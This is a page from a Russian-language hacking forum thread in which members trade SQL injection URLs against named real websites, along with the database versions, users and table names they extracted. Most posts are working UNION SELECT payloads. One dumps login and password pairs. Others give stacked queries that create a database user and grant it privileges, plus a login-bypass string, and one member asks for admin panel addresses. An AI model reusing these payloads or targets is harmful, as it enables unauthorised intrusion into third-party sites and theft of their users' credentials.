HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #13731  
Старый 14.03.2011, 11:22
HellFire
Познающий
Регистрация: 18.01.2009
Сообщений: 62
Провел на форуме:
2832076

Репутация: 42
По умолчанию

Немецкая газетенка:

Код:
Code:
http://www.atlantic-times.com/archive_detail.php?recordID=1-0.1+UNION+SELECT+1,2,3,4,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),0x71),0x71),6,7,8,9--
Database Version: 5.5.8

Database name: content

User name: content@localhost
 
Ответить с цитированием

  #13732  
Старый 14.03.2011, 12:24
LiRvD082
Новичок
Регистрация: 04.10.2009
Сообщений: 1
Провел на форуме:
14740

Репутация: 0
По умолчанию

Цитата:
Сообщение от None  
http://cat.rusbic.ru/?rgn=80&cn=1)+UNION+SELECT+null,null,cast(user+as+ text),null,null,null,null,null,null,null,null,null ,null,null,null,null--+
user=postgres

version()=PostgreSQL 8.3.11 on x86_64-pc-linux-gnu, compiled by GCC gcc-4.3.real (Debian 4.3.2-1.1) 4.3.2

current_database()=bb

inet_server_addr()=

Создаём нового пользователя:

id=27;CREATE USER hacker PASSWORD 'mypass';

Даём юзеру права на создание новых БД и новых пользователей:

id=27;ALTER USER test1 CREATEUSER CREATEDB;

http://cat.rusbic.ru/?id=76;CREATE TABLE аааа (b text);

Цитата:
Сообщение от None  
http://irkutsk.ru/users/profile/4424
http://irkutsk.ru/login/
POST:uml=konstantin@lagutin.com';+--+&upass=dgfjh
login:konstantin@lagutin.com';+--+
pass:12345
Цитата:
Сообщение от None  
http://rusuper.ru/objs/view1.php?id_city=30&id_obj=-3251+UNION+SELECT+1,2,3,group_concat(unhex(hex(col umn_name))),5,6,7,8,9+FROM+INFORMATION_SCHEMA.colu mns+where+table_name=0x7573657273--
 
Ответить с цитированием

  #13733  
Старый 14.03.2011, 20:46
stasiliy
Новичок
Регистрация: 26.09.2009
Сообщений: 22
Провел на форуме:
44954

Репутация: 0
По умолчанию

http://pcboards.ru/show.php?dev=109+order+by+13
 
Ответить с цитированием

  #13734  
Старый 14.03.2011, 22:34
asql
Guest
Сообщений: n/a
Провел на форуме:
8829

Репутация: -3
По умолчанию

http://www.freehands.ru/game.php?set_phone_model=-148+union+select+null,null,group_concat(table_name +separator+0x3a)+from+information_schema.tables--
 
Ответить с цитированием

  #13735  
Старый 15.03.2011, 12:20
Unknown
Guest
Сообщений: n/a
Провел на форуме:
191387

Репутация: 6
По умолчанию

Цитата:
Сообщение от asql  
asql said:
http://www.kinovdom.ru/catalog.php?catID=999999999999+union+select+concat _ws(0x3a3a3a,Login,Password)+from+logins+limit+0,1--
Если кто зайдет в админку, отпишите плиз адрес (админки)
клац

/showthread.php?p=2596026#post2596026
 
Ответить с цитированием

  #13736  
Старый 15.03.2011, 15:15
AC//DC
Познающий
Регистрация: 28.07.2009
Сообщений: 98
Провел на форуме:
247684

Репутация: 136
По умолчанию

http://www.aist-climat.ru/catalog/list/?id=-6349%20and%201=2%20union%20select%201,concat_ws(ch ar(58),@@version,user(),database()),3,4,5,6,7,8,9, 10,11,12,13,14,15,16,17+--

4.1.25-log cms5ru69_aist@localhost cms5ru69_aist
 
Ответить с цитированием

  #13737  
Старый 15.03.2011, 17:22
asql
Guest
Сообщений: n/a
Провел на форуме:
8829

Репутация: -3
По умолчанию

http://www.texe.com/view.php?page=-34+union+select+1,group_concat(table_name+separato r+0x3a),3,4,5+from+information_schema.tables--

http://www.pandora.biz.ua/index.php?p=-35+union+select+1,2,group_concat(concat_ws(0x3a3a3 a,cat_id,root_cat,name_cat,descr,sh_descr,img,por) +separator+0x2a2a2a)+from+category--
 
Ответить с цитированием

  #13738  
Старый 15.03.2011, 20:37
Unknown
Guest
Сообщений: n/a
Провел на форуме:
34733

Репутация: 83
По умолчанию

http://thomasdane.myzen.co.uk/artist.php?artist_id=-9%20union%20select%201,2,3,version(),5+--+
 
Ответить с цитированием

  #13739  
Старый 17.03.2011, 00:04
Compton
Участник форума
Регистрация: 31.01.2010
Сообщений: 170
Провел на форуме:
1442841

Репутация: 63
Отправить сообщение для Compton с помощью AIM Отправить сообщение для Compton с помощью Yahoo
По умолчанию

Код:
Code:
http://www.saittrojans.com/teams/schedule.html?sportID=-3+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,group_concat(table_name)+from+information_schema.tables--
5 ветка
 
Ответить с цитированием

  #13740  
Старый 18.03.2011, 02:07
bloodAngel
Новичок
Регистрация: 29.06.2007
Сообщений: 18
Провел на форуме:
642141

Репутация: 17
Отправить сообщение для bloodAngel с помощью ICQ
По умолчанию

Код:
Code:
http://www.mtosmt.org/mto-announce.php?id=-74+union+select+1,group_concat%28table_name%29,3,4,5+from+information_schema.tables--
5.1.33-log / mtoadmin_db

Код:
Code:
http://www.go-whippet.co.uk/announce.php?id=1%20or%281,2%29=%28select*from%28select%20name_const%28version%28%29,1%29,name_const%28version%28%29,1%29%29a%29
'5.0.77'
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ